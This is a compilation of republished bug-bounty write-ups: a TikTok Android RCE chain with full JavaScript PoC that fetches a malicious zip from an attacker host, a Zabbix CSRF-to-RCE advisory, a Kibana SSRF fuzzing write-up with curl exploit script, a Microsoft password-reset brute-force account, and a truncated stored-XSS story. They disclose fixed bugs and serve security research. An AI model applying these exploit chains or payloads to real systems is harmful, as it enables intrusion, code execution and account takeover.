TikTok for Android 1-Click RCE

TikTok for Android 1-Click RCE

Original text by Sayed Abdelhafiz


While testing TikTok for Android Application, I identified multiple bugs that can be chained to achieve Remote code execution that can be triaged through multiple dangerous attack vectors. In this write-up, we will discuss every bug and chain altogether. I worked on it for about 21-day, a long time. The final exploit was simple. The long time I spent in this exploit got me incredible experience and an important trick that helped me a lot in the exploit. TikTok implemented a fix to address the bugs identified, and it was retested to confirm the resolution.


  1. Universal XSS on TikTok WebView
  2. Another XSS on AddWikiActivity
  3. Start Arbitrary Components
  4. Zip Slip in TmaTestActivity
  5. RCE!

Universal XSS on TikTok WebView

TikTok uses a specific WebView that can be invoked by deep-link, Inbox Messages. The WebView handle something called falcon links by grabbing it from the internal files instead of fetching it from their server every time the user uses it to increase the performance.

For performance measuring purposes, after finishing loading the page. The following function will get executed:

this.a.evaluateJavascript("JSON.stringify(window.performance.getEntriesByName(\'" + this.webviewURL + "\'))", v2);

The first idea got on my mind is injecting XSS Payload in the URL to escape the function call and execute my malicious code.

I tried the following link https://m.tiktok.com/falcon/?'),alert(1));//

Unfortunately, It didn’t work. I write a Frida script to hook android.webkit.WebView.evaluateJavascript Method to see what happens?

I found the following string is passed to the method:


The payload is getting encoded because It was in the query string segment. So I decided to put the payload in the fragment segment After #

https://m.tiktok.com/falcon/#'),alert(1));// will fire the following line:


Now, It’s done! We have Universal XSS in that WebView.

Notice: It’s Universal XSS because that javascript code is fired if the link contains something like: m.tiktok.com/falcon/.

For example, https://www.google.com/m.tiktok.com/falcon/ will fire this XSS too.


After find this XSS, I started digging in that WebView to see how It can be harmful.

First, I set up my lab to make it easy for my testing. I have enabled WebViewDebug module to debug the WebView from my dev-tools in google chrome. You find the module here: https://github.com/feix760/WebViewDebugHook

I found that WebView supports the intent scheme. This scheme can make you able to build a customize intent and launch it as an activity. It’s helpful to avoid the export setting of the non-exported activities and maximize the testing scope.

Read the following paper for more information about this intent and how to implents: https://www.mbsd.jp/Whitepaper/IntentScheme.pdf

I tried to execute the following javascript code to open com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity Activity:

location = "intent:#Intent;component=com.zhiliaoapp.musically/com.ss.android.ugc.aweme.favorites.ui.UserFavoritesActivity;package=com.zhiliaoapp.musically;action=android.intent.action.VIEW;end;"

But I didn’t notice any effect of executing that javascript. I back to the WebViewClient to see what was happening. And the following code came:

boolean v0_7 = v0_6 == null ? true : v0_6.hasClickInTimeInterval();
if((v8.i) && !v0_7) {
v8.i = false;
v4 = true;
else {
v4 = v0_7;

This code restricts the intent scheme to takes effect unless the user has just clicked anywhere. Bad! I don’t prefer 2-click exploits. I saved it in my note and continue my digging trip.

ToutiaoJSBridge, It’s a bridge implemented in the WebView. It has many fruit functions, one of them was openSchema that used to open internal deep-links. There a deep link called aweme://wiki It used to open URLs on AddWikiActivity WebView.

Another XSS on AddWikiActivity

AddWikiActivity Implementing URL validation to make sure that no black URL would be opened in it. But the validation was in http or https schemes only. Because they think that any other scheme is invalid and don’t need to validate:

if(!e.b(arg8)) {
com.bytedance.t.c.e.b.a("AbsSecStrategy", "needBuildSecLink : url is invalid.");
return false;
}public static boolean b(String arg1) {
return !TextUtils.isEmpty(arg1) && ((arg1.startsWith("http")) || (arg1.startsWith("https"))) && !e.a(arg1);

Pretty cool, If the validation is not on the javascript scheme. We can use that scheme to perform XSS attacks on that WebView too!

"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript://m.tiktok.com/%250adocument.write(%22%3Ch1%3EPoC%3C%2Fh1%3E%22)&disable_app_link=false"
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"

<h1>PoC</h1> got printed on the WebView

Start Arbitrary Components

The good news is AddWikiActivity WebView supports the the intent scheme too without any restriction but if disable_app_link parameter was set to false. Easy man!

if the following code got execute in AddWikiActivity The UserFavoritesActivity will get invoked:


Zip Slip in TmaTestActivity

Now, we can open any activity and pass any extras to it. I found an activity called TmaTestActivity in a split package called split_df_miniapp.apk.

Notice: the splits packages don’t attach in the APK. It got downloaded after the first launch of the application by google play core. You can find those package by: adb shell pm path {package_name}

In a nutshell, TmaTestActivity was used to update the SDK by downloading a zip from the internet and extract it.

Uri v5 = Uri.parse(Uri.decode(arg5.toString()));
String v0 = v5.getQueryParameter("action");
if(m.a(v0, "sdkUpdate")) {
m.a(v5, "testUri");
this.updateJssdk(arg4, v5, arg6);

To Invoke the update process we have to set action parameter to sdkUpdate.

private final void updateJssdk(Context arg5, Uri arg6, TmaTestCallback arg7) {
String v0 = arg6.getQueryParameter("sdkUpdateVersion");
String v1 = arg6.getQueryParameter("sdkVersion");
String v6 = arg6.getQueryParameter("latestSDKUrl");
SharedPreferences.Editor v2 = BaseBundleDAO.getJsSdkSP(arg5).edit();
v2.putString("sdk_update_version", v0).apply();
v2.putString("sdk_version", v1).apply();
v2.putString("latest_sdk_url", v6).apply();
DownloadBaseBundleHandler v6_1 = new DownloadBaseBundleHandler();
BundleHandlerParam v0_1 = new BundleHandlerParam();
v6_1.setInitialParam(arg5, v0_1);
ResolveDownloadHandler v5 = new ResolveDownloadHandler();
SetCurrentProcessBundleVersionHandler v6_2 = new SetCurrentProcessBundleVersionHandler();

It collects the SDK updating information from the parameters, then invoke DownloadBaseBundleHandler instance, then set the next handler to ResolveDownloadHandler, then SetCurrentProcessBundleVersionHandler

Let’s start with DownloadBaseBundleHandler. It checks sdkUpdateVersion parameter to see if it was newer than the current one or not. We can set the value to 99.99.99 to avoid this check, then starting the download:

public BundleHandlerParam handle(Context arg14, BundleHandlerParam arg15) {
String v0 = BaseBundleManager.getInst().getSdkCurrentVersionStr(arg14);
String v8 = BaseBundleDAO.getJsSdkSP(arg14).getString("sdk_update_version", "");
if(AppbrandUtil.convertVersionStrToCode(v0) >= AppbrandUtil.convertVersionStrToCode(v8) && (BaseBundleManager.getInst().isRealBaseBundleReadyNow())) {
InnerEventHelper.mpLibResult("mp_lib_validation_result", v0, v8, "no_update", "", -1L);
v10.appendLog("no need update remote basebundle version");
arg15.isIgnoreTask = true;
return arg15;
this.startDownload(v9, v10, arg15, v0, v8);

In startDownload Method, I found that:

v2.a = StorageUtil.getExternalCacheDir(AppbrandContext.getInst().getApplicationContext()).getPath();
v2.b = this.getMd5FromUrl(arg16);

v2.a is the download path. It gets the application context from AppbrandContext and it must have an Instance. Unfortunately, the application didn’t init this instance all time. But I told you that I spent 21-day on this exploit, yeah!? It was enough for me to gain extensive knowledge about the application workflow. And yes! I saw somewhere this instance getting inited.

Invoking the preloadMiniApp function through ToutiaoJSBridge was able to init the instance for me! It was easy for me! Digging on every function on this bridge, even It doesn’t look helpful for me for the first time, but it became useful in this situation ;).

v2.b is the md5sum of the downloading file. It gets from the filename itself:

private String getMd5FromUrl(String arg3) {
return arg3.substring(arg3.lastIndexOf("_") + 1, arg3.lastIndexOf("."));

The filename must look like: anything_{md5sum_of_file}.zip because the md5sum will be compared with the file md5sum after downloading:

public void onDownloadSuccess(ad arg11) {
File v11 = new File(this.val$tmaFileRequest.a, this.val$tmaFileRequest.b);
long v6 = this.val$beginDownloadTime.getMillisAfterStart();
if(!v11.exists()) {
this.val$baseBundleEvent.appendLog("remote basebundle download fail");
this.val$param.isLastTaskSuccess = false;
this.val$baseBundleEvent.appendLog("remote basebundle not exist");
InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "fail", "md5_fail", v6);
else if(this.val$tmaFileRequest.b.equals(CharacterUtils.md5Hex(v11))) {
this.val$baseBundleEvent.appendLog("remote basebundle download success, md5 verify success");
this.val$param.isLastTaskSuccess = true;
this.val$param.targetZipFile = v11;
InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "success", "", v6);
else {
this.val$baseBundleEvent.appendLog("remote basebundle md5 not equals");
InnerEventHelper.mpLibResult("mp_lib_download_result", this.val$localVersion, this.val$latestVersion, "fail", "md5_fail", v6);
this.val$param.isLastTaskSuccess = false;

After download processing finished, the file gets passed to ResolveDownloadHandler, to unzip It:

public BundleHandlerParam handle(Context arg13, BundleHandlerParam arg14) {
BaseBundleEvent v0 = arg14.baseBundleEvent;
if((arg14.isLastTaskSuccess) && arg14.targetZipFile != null && (arg14.targetZipFile.exists())) {
arg14.bundleVersion = BaseBundleFileManager.unZipFileToBundle(arg13, arg14.targetZipFile, "download_bundle", false, v0);public static long unZipFileToBundle(Context arg8, File arg9, String arg10, boolean arg11, BaseBundleEvent arg12) {
long v10;
boolean v4;
Class v0 = BaseBundleFileManager.class;
synchronized(v0) {
boolean v1 = arg9.exists();
if(!v1) {
return 0L;
try {
File v1_1 = BaseBundleFileManager.getBundleFolderFile(arg8, arg10);
arg12.appendLog("start unzip" + arg10);
BaseBundleFileManager.tryUnzipBaseBundle(arg12, arg10, v1_1.getAbsolutePath(), arg9);private static void tryUnzipBaseBundle(BaseBundleEvent arg2, String arg3, String arg4, File arg5) {
try {
arg2.appendLog("unzip" + arg3);
IOUtils.unZipFolder(arg5.getAbsolutePath(), arg4);
}public static void unZipFolder(String arg1, String arg2) throws Exception {
IOUtils.a(new FileInputStream(arg1), arg2, false);
}private static void a(InputStream arg5, String arg6, boolean arg7) throws Exception {
ZipInputStream v0 = new ZipInputStream(arg5);
while(true) {
ZipEntry v5 = v0.getNextEntry();
if(v5 == null) {
String v1 = v5.getName();
if((arg7) && !TextUtils.isEmpty(v1) && (v1.contains("../"))) { // Are you notice arg7?
goto label_2;
if(v5.isDirectory()) {
new File(arg6 + File.separator + v1.substring(0, v1.length() - 1)).mkdirs();
goto label_2;
File v5_1 = new File(arg6 + File.separator + v1);
if(!v5_1.getParentFile().exists()) {
FileOutputStream v1_1 = new FileOutputStream(v5_1);
byte[] v5_2 = new byte[0x400];
while(true) {
int v3 = v0.read(v5_2);
if(v3 == -1) {
v1_1.write(v5_2, 0, v3);

In the last method called to unzip the file, there is a check for path traversal, but because arg7 value is false, the check won’t happen! Perfect!!

It makes us able to exploit ZIP Slip and overwrite some delicious files.

Time for RCE!

I created a zip file and path traversed the filename to overwrite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so file:

dphoeniixx@MacBook-Pro Tiktok % 7z l libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64)

Scanning the drive for archives:
1 file, 1930 bytes (2 KiB)

Listing archive: libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip

Path = libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip
Type = zip
Physical Size = 1930

Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 ..... 5896 1496 ../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
------------------- ----- ------------ ------------ ------------------------
2020-11-26 04:08:29 5896 1496 1 files

Now we can overwrite native-libraries with a malicious library to execute our code. It won’t be executed unless the user relaunches the Application. I found a way to reload that library without relaunch by launching com.tt.miniapphost.placeholder.MiniappTabActivity0 Activity.

Final PoC:

document.title = "Loading..";
if (document && window.name != "finished") { // the XSS will be fired multiple time before loading the page and after. this condition to make sure that the payload won't fire multiple time.
window.name = "finished";
"__callback_id": "0",
"func": "preloadMiniApp",
"__msg_type": "callback",
"params": {
"mini_app_url": "https://microapp/"
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://d.c/"
})); // initialize Mini App
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%2F%2Fwww.google.com.eg%2F%3Faction%3DsdkUpdate%26latestSDKUrl%3Dhttp%3A%2F%2F{ATTACKER_HOST}%2Flibran_a1ef01b09a3d9400b77144bbf9ad59b1.zip%26sdkUpdateVersion%3D1.87.1.11%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapp.tmatest.TmaTestActivity%3Bpackage%3Dcom.zhiliaoapp.musically%3Baction%3Dandroid.intent.action.VIEW%3Bend%22)%3B%0A&noRedirect=false&title=First%20Stage&disable_app_link=false"
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
})); // Download malicious zip file that will overwite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
setTimeout(function() {
"__callback_id": "0",
"func": "openSchema",
"__msg_type": "callback",
"params": {
"schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapphost.placeholder.MiniappTabActivity0%3Bpackage%3Dcom.zhiliaoapp.musically%3BS.miniapp_url%3Dhttps%3Bend%22)%3B%0A&noRedirect=false&title=Second%20Stage&disable_app_link=false"
"JSSDK": "1",
"namespace": "host",
"__iframe_url": "http://iframe.attacker.com/"
})); // load the malicious library after overwrtting it.
}, 5000);

Malicious library code:

#include <jni.h>
#include <string>
#include <stdlib.h>

JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
system("id > /data/data/com.zhiliaoapp.musically/PoC");
return JNI_VERSION_1_6;

TikTok Fixing!

TikTok Security implemented an excellent and responsible fix to address those vulnerabilities in a timely manner. The following actions were taken:

  1. The vulnerable XSS code has been deleted.
  2. TmaTestActivity has been deleted.
  3. Implement restrictions to intent scheme that doesn’t allow an intent for TikTok Application on AddWikiActivity and Main WebViewActivity.

Have a nice day!

CVE-2021-27927: CSRF to RCE Chain in Zabbix

RCE Chain in Zabbix

Original text horizon3ai


Zabbix is an enterprise IT network and application monitoring solution. In a routine review of its source code, we discovered a CSRF (cross-site request forgery) vulnerability in the authentication component of the Zabbix UI. Using this vulnerability, an unauthenticated attacker can take over the Zabbix administrator’s account if the attacker can persuade the Zabbix administrator to follow a malicious link. This vulnerability is exploitable in all browsers even with the default SameSite=Lax cookie protection in place. The vulnerability is fixed in Zabbix versions 4.0.28rc1, 5.0.8rc1, 5.2.4rc1, and 5.4.0alpha1.


The impact of this vulnerability is high. While user interaction is required to exploit the vulnerability, the consequence of a successful exploit is full takeover of the Zabbix administrator account. Administrative access to Zabbix provides attackers a wealth of information about other devices on the network and the ability to execute arbitrary commands on the Zabbix server. In certain configurations, attackers can also execute arbitrary commands on hosts being monitored by Zabbix.

CVSS vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

As of this writing, there are ~20K instances of Zabbix on the Internet that can be found with the Shodan dork «html: Zabbix».


Upgrade to at least Zabbix version 4.0.28rc1, 5.0.8rc1, 5.2.4rc1, or 5.4.0alpha1.


A CSRF exploit works as follows:

  • First, a user (the victim) logs in to a vulnerable web site (the target). «Logged in» in this case simply means the user’s browser has stored within it a valid session cookie or basic authentication credential for the target web site. The browser application doesn’t necessarily need to be open.  
  • Next, an attacker uses social engineering to persuade the victim user to follow a link to a malicious attacker-controlled web site. There are a variety of methods to achieve this such as phishing emails or links in chat, etc.  
  • When the victim visits the malicious web site, HTML/JavaScript code from the malicious site gets loaded into the victim’s browser. This code then sends an API request to the target web site. The request originating from the malicious web site looks legitimate to the victim’s browser, and as a result, the victim’s browser sends the user’s session cookies along with the request.  
  • The malicious request lands at the target web application. The target web application can’t tell that the request is coming from a malicious source. The target web application carries out the requested action on behalf of the attacker. CSRF attacks often try to abuse authentication-related actions such as creating or modifying users or changing passwords.

CSRF Attack Prevention

The most commonly used defense against CSRF attacks is to use anti-CSRF tokens. These tokens are randomly generated pieces of data that are sent as part of requests from an application’s frontend code to the backend. The backend verifies both the anti-CSRF token and the user’s session cookie. The token can be transferred as a HTTP header or in the request body, but not as a cookie. This method, if implemented correctly, defeats CSRF attacks because it becomes very difficult for attackers to craft forged requests that include the correct anti-CSRF token.

Zabbix uses an anti-CSRF token in the form of a sid parameter that’s passed in the request body. For instance the request to update the Zabbix Admin user’s password to the value zabbix1 looks like this:

This request fails if the sid parameter is missing or incorrect.

Another measure that offers some protection against CSRF attacks is the Same-Site cookie attribute. This is a setting that browsers use to determine when it’s ok to transfer cookies as part of cross-site requests to a site. This attribute has three values: StrictLax, and None.

  • Same-Site=Strict: Never send cookies as part of cross-site requests.
  • Same-Site=Lax: Only send cookies as part of cross-site requests if they are GET requests and effect a top-level navigation, i.e. result in a change to the browser’s address bar. Clicking a link is considered a top-level navigation, while loading an image or script is not. GET requests are generally considered safe because they are not supposed to mutate any backend state.
  • Same-Site-None: Send cookies along for all cross-site requests.

Web application developers can choose to set the value of the Same-Site attribute explicitly as part of sending a cookie to the front-end after a user authenticates. If the attribute is not set explicitly, modern browsers will default the value to Lax. This is the case with Zabbix — the Same-Site attribute is not set and it’s defaulted to Lax.

Zabbix CVE-2021-27927

As mentioned above, Zabbix uses anti-CSRF tokens, and these tokens are effective against CSRF attacks that attempt to exploit actions such as adding and modifying users and roles. However there was one important scenario we found in which anti-CSRF tokens were not being validated: an update to the application’s authentication settings.

This form controls the type of authentication that is used to login to Zabbix, which can be one of «Internal» or «LDAP». In the event of LDAP, one can also set the details of the LDAP provider such as the LDAP host and port, base DN, etc.

The backend controller class CControllerAuthenticationUpdate that handles this form submission had token validation turned off, as shown below:

In addition, and just as important, we found that in Zabbix any parameters submitted in a request body via POST could equivalently be submitted as URL query parameters via a GET. This meant that the following forged GET request, which is missing the sid parameter could work just as well as a legitimate POST request that contains the sid.

GET /zabbix.php?form_refresh=1&action=authentication.update&db_authentication_type=0&authentication_type=1&http_auth_enabled=0&ldap_configured=1&ldap_host=!&saml_auth_enabled=0&update=Update

The above request updates the authentication method to LDAP and sets various LDAP attributes.


To carry out a fully attack, an attacker would do the following:

First, set up an attacker-controlled LDAP server that is network accessible to the target Zabbix application. For our example, we used an Active Directory server at We also provisioned a user called «Admin» (which matches the built-in Zabbix admin user name) inside Active Directory with the password «Z@bb1x!».  

Then, host a web site containing a malicious HTML page. For our example, we had an HTML page that contained a link with the forged cross-site request. Upon loading the page, the link would be automatically clicked via JavaScript. This meets the requirement for «top-level navigation.»


  <p>Any web site</p>
  <a id='link' href='!&saml_auth_enabled=0&update=Update'></a>


Finally, entice the victim Zabbix Admin user to click on link to the malicious site. Once this happens, the Zabbix Admin would see that the authentication settings on the site were automatically updated like this:

At this point an attacker can log in with his/her own Admin user credential. Incidentally, the victim Zabbix Admin’s session still remains valid until he/she logs out.

One interesting aspect of this particular CSRF attack is that it’s not blind. This is because Zabbix validates the LDAP server connection using a test user and password as part of processing the authentication settings form submission. An attacker can know immediately if the CSRF attack was successful by virtue of the Zabbix application connecting to his/her own LDAP server. Once the test connection takes place, an attacker could automate logging into the victim’s Zabbix server and carrying out further actions.

Remote Command Execution

Once an attacker has gained admin access, he/she can gain remote command execution privileges easily because it is a built-in feature of the product. The Scripts section of the UI contains a place to drop in any commands to be executed on either the Zabbix server, a Zabbix server proxy, or a Zabbix agent (agents run on hosts being monitored by Zabbix).

For instance, to get a reverse shell on the Zabbix server, an attacker could modify the built-in Detect Operating Systems script to include a perl reverse shell payload like this:

Then execute the script off the dashboard page:

To get reverse shell:

Depending on the configuration, an attacker can also run remote commands at the server proxy or agent. More details here from the Zabbix documentation.


  • Jan. 3, 2021: Vulnerability disclosed to vendor
  • Jan. 13, 2021: Vulnerability fixed in code by vendor
  • Feb. 22, 2021: New releases made available by vendor across all supported versions
  • Mar. 3, 2021: Public disclosure  


SSRF: Bypassing hostname restrictions with fuzzing

SSRF: Bypassing hostname restrictions with fuzzing

Original text by dee__see

When the same data is parsed twice by different parsers, some interesting security bugs can be introduced. In this post I will show how I used fuzzing to find a parser diffential issue in Kibana’s alerting and actions feature and how I leveraged radamsa to fuzz NodeJS’ URL parsers.

Kibana alerting and actions

Kibana has an alerting feature that allows users to trigger an action when certain conditions are met. There’s a variety of actions that can be chosen like sending an email, opening a ticket in Jira or sending a request to a webhook. To make sure this doesn’t become SSRF as a feature, there’s an xpack.actions.allowedHosts setting where users can configure a list of hosts that are allowed as webhook targets.

Parser differential

Parsing URLs consistently is notoriously difficult and sometimes the inconsistencies are there on purpose. Because of this, I was curious to see how the webhook target was validated against the xpack.actions.allowedHosts setting and how the URL was parsed before sending the request to the webhook. Is it the same parser? If not, are there any URLs that can appear fine to the hostname validation but target a completely different URL when sending the HTTP request?

After digging into the webhook code, I coud identify that hostname validation happens in isHostnameAllowedInUri. The important part to notice is that the hostname is extracted from the webhook’s URL by doing new URL(userInputUrl).hostname.

function isHostnameAllowedInUri(config: ActionsConfigType, uri: string): boolean {
  return pipe(
    tryCatch(() => new URL(uri)),
    map((url) => url.hostname),
    mapNullable((hostname) => isAllowed(config, hostname)),
    getOrElse<boolean>(() => false)

On the other hand, the library that sends the HTTP request uses require('url').parse(userInputUrl).hostname to parse the hostname.

var url = require('url');

// ...

// Parse url
var fullPath = buildFullPath(config.baseURL, config.url);
var parsed = url.parse(fullPath);

// ...

options.hostname = parsed.hostname;

After reading some documentation, I could validate that those were effectively two different parsers and not just two ways of doing the same thing. Very interesting! Now I’m looking for a URL that is accepted by isHostnameAllowedInUri but results in an HTTP request to a different host. In other words, I’m looking for X where new URL(X).hostname !== require('url').parse(X).hostname and this is where the fuzzing comes in.

Fuzzing for SSRF

When you’re looking to generate test strings without going all in with coverage guided fuzzing like AFL or libFuzzer, radamsa is the perfect solution.

Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading sample files of valid data and generating interestringly different outputs from them.

The plan was the following:

  1. Feed a normal URL to radamsa as a starting point
  2. Parse radamsa’s output using both parsers
  3. If both parsed hostnames are different and valid, save that URL

Here’s the code used to do the fuzzing and validate the results:

const child_process = require('child_process');
const radamsa = child_process.spawn('./radamsa/bin/radamsa', ['-n', 'inf']);

radamsa.stdout.on('data', function (input) {
    input = 'http://' + input

    // Resulting host names need to be valid for this to be useful
    function isInvalid(host) {
        return host === null || host === '' || !/^[a-zA-Z0-9.-]+$/.test(host1);

    let host1;
    try {
        host1 = new URL(input).hostname;
    } catch (e) {
        return; // Both hosts need to parse

    if (isInvalid(host1)) return;
    if (/^([0-9.]+)$/.test(host1)) return; // host1 should be a domain, not an IP

    let host2;
    try {
        host2 = require('url').parse(input).hostname;
    } catch (e) {
        return; // Both hosts need to parse

    if (isInvalid(host2)) return;
    if (host1 === host2) return;

        `${encodeURIComponent(input)} was parsed as ${host1} with URL constructor and ${host2} with url.parse.`

There are some issues with that code and I think the stdin writer might have trouble handling null bytes, but nevertheless after a little while this popped up (the output was URL-encoded to catch non-printable characters):

http%3A%2F%2Fuser%3Apass%40domain.com%094294967298%2F%3Fab%3D- was parsed as domain.com4294967298 with URL constructor and domain.com with url.parse.

With the original string containing the hostname domain.com<TAB>4294967298, one parser stripped the tab character and the other truncated the hostname where the tab was inserted. This is very interesting and can definitely be abused: imagine a webhook that requires the target to be yourdomain.com, but when you enter yourdomain.co<TAB>m the filter thinks it’s valid but the request is actually sent to yourdomain.co. All the attacker has to do is register that domain and point it to or any other internal target and it makes for a fun SSRF.

The attack

This is exactly what could be achived in Kibana.

  1. Assume the xpack.actions.allowedHosts setting requires webhooks to target yourdomain.com
  2. As the attacker, register yourdomain.co
  3. Add a DNS record pointing to or any other internal IP
  4. Create a webhook action
  5. Use the API to send a test message to the webhook and specify the url yourdomain.co<TAB>m
  6. Observe the response, in this case there were 3 different responses allowing to differentiate a live host, a live host that responds to HTTP requests and a dead host

Here’s the script used to demonstrate the attack.


# The \t is important

# Create Webhook Action
connector_id=$(curl -sk -u "$creds" --url "$kibana_url/api/actions/action" -X POST -H 'Content-Type: application/json' -H 'kbn-xsrf: true' \
    -d '{"actionTypeId":".webhook","config":{"method":"post","hasAuth":false,"url":"'$ssrf_target'","headers":{"content-type":"application/json"}},"secrets":{"user":null,"password":null},"name":"'$(date +%s)'"}' |
    jq -r .id)

# Send request to target using the test function
curl -sk -u "$creds" --url "$kibana_url/api/actions/action/$connector_id/_execute" -X POST -H 'Content-Type: application/json' -H 'kbn-xsrf: true' \
    -d '{"params":{"body":"{\"arbitrary_payload_here\":true}"}}'

# Server should have received the request


Unfortunately, the resulting URL with the bypass is a bit mangled as we can see from this output taken from the NodeJS console:

> require('url').parse("htts://example.co\x09m/path")
Url {
  protocol: 'htts:',
  slashes: true,
  auth: null,
  host: 'example.co',
  port: null,
  hostname: 'example.co',
  hash: null,
  search: null,
  query: null,
  pathname: '%09m/path',
  path: '%09m/path',
  href: 'htts://example.co/%09m/path' }

The part that is truncated from the hostname is just pushed to the path and make it hard to craft any request that can achieve more than the basic internal network/port scan. However, if the parsers’ roles had been inverted and new URI had been used for the request instead I would have had a clean path and much more potential for exploitation with a fully controlled path and POST body. Certainly this situation comes up somewhere, let me know if you come across something like that and are able to exploit it!


A few things to take away from this:

  • When reviewing code, any time data is parsed for valiation make sure it’s parsed the same way when it’s being used
  • Fuzzing with radamsa is simple and quick to setup, a great addition to any bug hunter’s toolbet
  • If you’re doing blackbox testing and facing hostname validations in a NodeJS envioronment, try to add some tabs and see where that leads

Thanks for reading!

(This was disclosed with permission)

How I Might Have Hacked Any Microsoft Account

How I Might Have Hacked Any Microsoft Account

Original text by LAXMAN MUTHIYAH

This article is about how I found a vulnerability on Microsoft online services that might have allowed anyone to takeover any Microsoft account without consent permission. Microsoft security team patched the issue and rewarded me $50,000 as a part of their Identity Bounty Program.

After my Instagram account takeover vulnerability, I was searching for similar loopholes in other services. I found Microsoft is also using the similar technique to reset user’s password so I decided to test them for any rate limiting vulnerability.

To reset a Microsoft account’s password, we need to enter our email address or phone number in their forgot password page, after that we will be asked to select the email or mobile number that can be used to receive security code.

Once we receive the 7 digit security code, we will have to enter it to reset the password. Here, if we can bruteforce all the combination of 7 digit code (that will be 10^7 = 10 million codes), we will be able to reset any user’s password without permission. But, obviously, there will be some rate limits that will prevent us from making large number of attempts.

Intercepting the HTTP POST request made to code validation endpoint looked like this

If you look at the screenshot above, the code 1234567 we entered was nowhere present in the request. It was encrypted and then sent for validation. I guess they are doing this to prevent automated bruteforce tools from exploiting their system. So, we cannot automate testing multiple codes using tools like Burp Intruder since they won’t do the encryption part 😕

After some time, I figured out the encryption technique and was able to automate the entire process from encrypting the code to sending multiple concurrent requests.

My initial test showed the presence of rate limits as expected. Out of 1000 codes sent, only 122 of them got through, others are limited with 1211 error code and they are blocking the respective user account from sending further attempts if we continuously send requests.

Then, I tried sending simultaneous / concurrent requests like I did for Instagram, that allowed me to send large number of requests without getting blocked but I was still unable to get the successful response while injecting the correct 7 digit security code. I thought they have some controls in place to prevent this type of attack. Although I am getting an error while sending the right code, there was still no evidence of blocking the user like we saw in the initial test. So I was still hoping that there would be something.

Never Give Up Reaction GIF by Best Friends Animal Society

After some days, I realized that they are blacklisting the IP address if all the requests we send don’t hit the server at the same time, even a few milliseconds delay between the requests allowed the server to detect the attack and block it. Then I tweaked my code to handle this scenario and tested it again.

Supernatural Dean Winchester GIF

Surprisingly, it worked and I was able to get the successful response this time 😀

Celebration Dancing GIF by Juli

I sent around 1000 seven digit codes including the right one and was able to get the next step to change the password.

The above process is valid only for those who do not have two factor authentication enabled, if a user has enabled 2FA, we will have to bypass two factor code authentication as well, to change the password.

I tested an account with 2FA and found both are same endpoint that are vulnerable to this type of attack. At first, user will be prompted to enter a 6 digit code generated by authenticator app, only then they will be asked to enter 7 digit code sent to their email or phone number. Then, they can change the password.

Putting all together, an attacker has to send all the possibilities of 6 and 7 digit security codes that would be around 11 million request attempts and it has to be sent concurrently to change the password of any Microsoft account (including those with 2FA enabled).

It is not at all a easy process to send such large number of concurrent requests, that would require a lot of computing resources as well as 1000s of IP address to complete the attack successfully.

Immediately, I recorded a video of all the bypasses and submitted it to Microsoft along with detailed steps to reproduce the vulnerability. They were quick in acknowledging the issue.

The issue was patched in November 2020 and my case was assigned to different security impact than the one expected. I asked them to reconsider the security impact explaining my attack. After a few back and forth emails, my case was assigned to Elevation of Privilege (Involving Multi-factor Authentication Bypass). Due to the complexity of the attack, bug severity was assigned as important instead of critical.

Bount email from MSRC

Microsoft Acknowledgement for Reporting this issue

I received the bounty of $50,000 USD on Feb 9th, 2021 through hackerone and got approval to publish this article on March 1st. I would like to thank Dan, Jarek and the entire MSRC Team for patiently listening to all my comments, providing updates and patching the issue. I also like to thank Microsoft for the bounty 🙏 😊

Story Behind Sweet SSRF.

Story Behind Sweet SSRF.

Original text by Rohit Soni

Persistence is the Key to Success.🔥

Image for post

Hey everyone! I hope you all are doing well!

Rohit soni is back with another write-up and this time it’s about critical SSRF which leads to AWS credentials disclosure. Let’s dive into it without wasting time.

Couple of months back when there was lockdown in whole world due to COVID-19 pandemic I was spending my most of time in hunting, learning and exploring new stuff (specifically about pentesting😜).

One day while scrolling linkedin feed I saw one guy’s post saying got hall of fame in target.com website. The post caught my attention and as I was not hunting on any program I started hunting on that program.

Note: I am not allowed to disclose the target website. So, Let’s call it target.com

I created an account on target.com and started exploring every functionalities. After spending couple of hours hunting and exploring functionalities I saw my email address was reflected in the response in script tag as shown in below image.

Image for post
Look at that email address.

Ahh… Very first thing came into my mind was XSS. I changed my email address to testacc@hubopss.com-alert(“h4ck3d!!”)- But failed because it is not a valid email address. But In very next moment I intercepted the request using burp and changed my email address in intercepted request and forwarded it.

Boom….Got Stored XSS.

Image for post
XSS is Love❤ (Sorry for poor picture quality😅)
Image for post
